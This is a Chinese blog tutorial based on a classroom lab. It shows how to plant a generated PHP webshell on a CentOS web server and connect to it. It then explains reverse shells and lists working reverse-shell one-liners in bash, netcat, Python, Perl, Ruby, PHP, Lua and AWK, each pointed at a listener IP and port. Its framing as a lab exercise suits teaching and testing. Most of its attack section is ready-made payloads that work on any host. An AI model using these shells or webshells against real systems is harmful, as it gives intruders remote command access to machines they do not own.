linux|Linux简单渗透、反弹shell、常见脚本反弹方法

Linux简单渗透 这是我在课堂上做的一个小实验,首先电脑要有Java软件,没有去电脑管家下载一个,用于后期渗透。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第一步:打开软件点击管理,会出现让我们生成的界面,密码、密钥可以改,自己记住就行,这里我用的默认,有效载荷更具自己需求更改,这里我用的php,然后点击生成。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第二步:点击生成后会让我们选择一个存放文件地址,更具自己想放那放那,然后会在存放文件里生成一个php文件,右击我们用notepad++(这里我用的是notepad++)打开可以看到文件里的内容。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第三步:把刚才创好的php文件移动到我们的虚拟机(这里我用的centos,我用的FinalShell把php移到虚拟机里),我们需要将php文件移动到/var/www/html/这个目录下。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第四步:去网页访问自己的虚拟IP地址加端口号(端口号看自己的端口是多少,默认是80,端口号后面加刚才我们命名的那个php文件),访问之后页面是全白就对了,啥都没有。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第五步:点击目标添加,自己需要改的更具下面图片去修改相应的内容。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第六步:修改完成后我们先点击测试连接,看是否会成功连接,如果连接成功我们在点添加。(左边是连接成功的提示;右边是添加成功的提示)。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第七步:添加成功后会出现下面的一行内容。
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

第八步:我们右击这一行内容,然后点进入,如果出现下面界面,说明我们已经渗透成功了
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

【linux|Linux简单渗透、反弹shell、常见脚本反弹方法】 补充:连接云服务器(这里我没有云服务器,所以访问centos,成功进入)
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片


什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?
有如下情况:

  1. 某客户机中了你的网马,但是它在局域网内,你直接连接不了。
  2. 目标机器的ip动态改变,你不能持续控制。
  3. 由于防火墙等限制,对方机器只能发送请求,不能接收请求。
  4. 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。
0x01.bash 在攻击主机上执行端口监听:nc -lvvp port//port 为攻击主机端口号,并且此端口号没有被占用
在目标主机上执行:bash -i >& /dev/tcp/攻击主机ip/port 0>&1//port 为攻击主机端口号
nc -lvvp port(10000)//kali 上执行这条命令
bash -i >& /dev/tcp/攻击主机ip/10000 0>&1//centos 上执行这条命令
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

反弹成功会出现上面情况,当输入ifconfig/whoami会出现被攻击的信息
0x02.nc(netcat)反弹 在攻击主机上执行端口监听:nc -lvvp port//port 为攻击主机端口号,并且此端口号没有被占用
在目标主机上执行:nc -e /bin/bash 攻击主机ip port
nc -lvvp 10000//kali上执行
nc -e /bin/bash 192.168.11.128 10000//centsos上执行
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

常见脚本反弹 以上脚本是在目标主机上执行,其中 x.x.x.x 均为攻击主机ip,并且需要提前在攻击主机上进行监听相关端口,接下来就不再赘述
1.python nc -lvvp 10000
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.11.128",10000)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]); '
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

2.perl nc -lvvp 10000
perl -e '
use Socket;
$i="192.168.11.128";
$p=10000;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");
open(STDOUT,">&S"); open(STDERR,">&S");
exec("/bin/sh -i"); }; '
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

3.Ruby nc -lvvp 10000
ruby -rsocket -e 'exit if fork; c=TCPSocket.new("192.168.11.128","10000"); while(cmd=c.gets); IO.popen(cmd,"r"){|io|c.print io.read}end'
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

4.PHP nc -lvvp 10000
php -r '$sock=fsockopen("192.168.11.128",10000); exec("/bin/bash -i <&3 >&3 2>&3"); '
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

5.Lua (这个不一定成功)
nc -lvvp 10000
lua -e "require('socket'); require('os'); t=socket.tcp(); t:connect('192.168.11.128','10000'); os.execute('/bin/sh -i <&3 >&3 2>&3'); "
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片

6.AWK反弹 攻击的机器监听,在收到shell的时候不可以输入enter,不然会断开
nc -lvvp 10000
awk 'BEGIN{s="/inet/tcp/0/192.168.11.128/10000"; for(; s|&getline c; close(c))while(c|getline)print|&s; close(s)}'
linux|Linux简单渗透、反弹shell、常见脚本反弹方法
文章图片


    推荐阅读